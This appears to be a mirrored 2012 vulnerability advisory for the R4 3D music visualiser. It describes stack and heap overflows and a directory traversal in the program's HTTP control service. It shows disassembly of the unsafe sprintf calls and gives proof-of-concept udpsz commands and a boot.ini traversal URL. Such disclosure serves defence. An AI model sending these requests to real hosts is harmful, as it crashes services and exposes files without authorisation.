Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

R4 1.25 Overflows / Directory Traversal

🗓️ 17 Feb 2012 00:00:00Reported by Luigi AuriemmaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

R4 1.25 stack and heap overflow, directory traversa

Code
`#######################################################################  
  
Luigi Auriemma  
  
Application: R4  
http://r4.rabidhamster.org/R4/  
Versions: <= 1.25  
Platforms: Windows  
Bugs: A] stack overflow  
B] heap overflow  
C] directory traversal  
D] screenshot stack overflow  
Exploitation: remote  
Date: 09 Feb 2012  
Author: Luigi Auriemma  
e-mail: [email protected]  
web: aluigi.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bugs  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
From vendor's website:  
"R4 is a standalone OpenGL accelerated program which aims to produce  
animated 3D graphics in real-time that twist and turn with the music."  
  
It's very used in parties and other events in which are needed 3d  
animations based on the current music.  
  
  
#######################################################################  
  
=======  
2) Bugs  
=======  
  
  
R4 has an http service disabled by default which allows to control it  
from remote, all the following vulnerabilities are located in this  
component.  
  
  
-----------------  
A] stack overflow  
-----------------  
  
Buffer overflow caused by the calling of sprintf() for generating a log  
string using the HTTP arguments received from the client in a stack  
buffer of 2 kilobytes:  
  
0041ECD0 /$ 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]  
0041ECD4 |. 81EC 00080000 SUB ESP,800  
0041ECDA |. 85D2 TEST EDX,EDX  
0041ECDC |. 75 05 JNZ SHORT R4.0041ECE3  
0041ECDE |. BA 349C4B00 MOV EDX,R4.004B9C34  
0041ECE3 |> 8B8C24 08080000 MOV ECX,DWORD PTR SS:[ESP+808]  
0041ECEA |. 85C9 TEST ECX,ECX  
0041ECEC |. 75 05 JNZ SHORT R4.0041ECF3  
0041ECEE |. B9 349C4B00 MOV ECX,R4.004B9C34  
0041ECF3 |> 8B8424 0C080000 MOV EAX,DWORD PTR SS:[ESP+80C]  
0041ECFA |. 85C0 TEST EAX,EAX  
0041ECFC |. 74 2E JE SHORT R4.0041ED2C  
0041ECFE |. 53 PUSH EBX  
0041ECFF |. 8A18 MOV BL,BYTE PTR DS:[EAX]  
0041ED01 |. 84DB TEST BL,BL  
0041ED03 |. 5B POP EBX  
0041ED04 |. 74 26 JE SHORT R4.0041ED2C  
0041ED06 |. 50 PUSH EAX  
0041ED07 |. 51 PUSH ECX  
0041ED08 |. 52 PUSH EDX  
0041ED09 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]  
0041ED0D |. 68 60654B00 PUSH R4.004B6560 ; "]%s>%s [%s]"  
0041ED12 |. 50 PUSH EAX ; stack buffer  
0041ED13 |. E8 7B3C0000 CALL R4.00422993 ; sprintf()  
0041ED18 |. 83C4 14 ADD ESP,14  
0041ED1B |. 8D5424 00 LEA EDX,DWORD PTR SS:[ESP]  
0041ED1F |. 52 PUSH EDX  
0041ED20 |. E8 2BFEFFFF CALL R4.0041EB50  
0041ED25 |. 81C4 04080000 ADD ESP,804  
0041ED2B |. C3 RETN  
  
  
----------------  
B] heap overflow  
----------------  
  
Heap overflow/corruption caused by a long HTTP URI.  
  
  
----------------------  
C] directory traversal  
----------------------  
  
Directory traversal exploitable through the "loadfile" script command  
that can be executed from left_console.html and allows to view the  
files on the disk in which is installed the software.  
  
  
----------------------------  
D] screenshot stack overflow  
----------------------------  
  
Stack overflow through the "miniscreenshot" command:  
  
0040B980 . 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]  
0040B984 . 81EC 04010000 SUB ESP,104  
...  
0040BA1F . 8B15 109C4B00 MOV EDX,DWORD PTR DS:[4B9C10]  
0040BA25 . 56 PUSH ESI  
0040BA26 . 52 PUSH EDX  
0040BA27 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]  
0040BA2B . 68 F02A4B00 PUSH R4.004B2AF0 ; "%s/scene/%s.jpg"  
0040BA30 . 50 PUSH EAX ; stack buffer  
0040BA31 . E8 5D6F0100 CALL R4.00422993 ; sprintf()  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
http://aluigi.org/testz/udpsz.zip  
  
A]  
udpsz -T -b a -c "GET /?" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 3000  
  
B]  
udpsz -T -b a -c "GET /" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 20000  
  
C]  
http://SERVER:8888/left_console.html?cmd=loadfile([../../../../../boot.ini])  
  
D]  
udpsz -T -b a -c "GET /left_console.html?cmd=miniscreenshot([" 0 -c "]) HTTP/1.0\r\n\r\n" -1 SERVER 8888 500  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
No fix.  
  
  
#######################################################################  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Feb 2012 00:00Current
0.4Low risk
Vulners AI Score0.4
r4openglmusicpartiesremotebuffer overflowsprintfheap overflowhttp uridirectory traversalloadfileleft_console.htmlminiscreenshotcodeudpszudpsz -t
24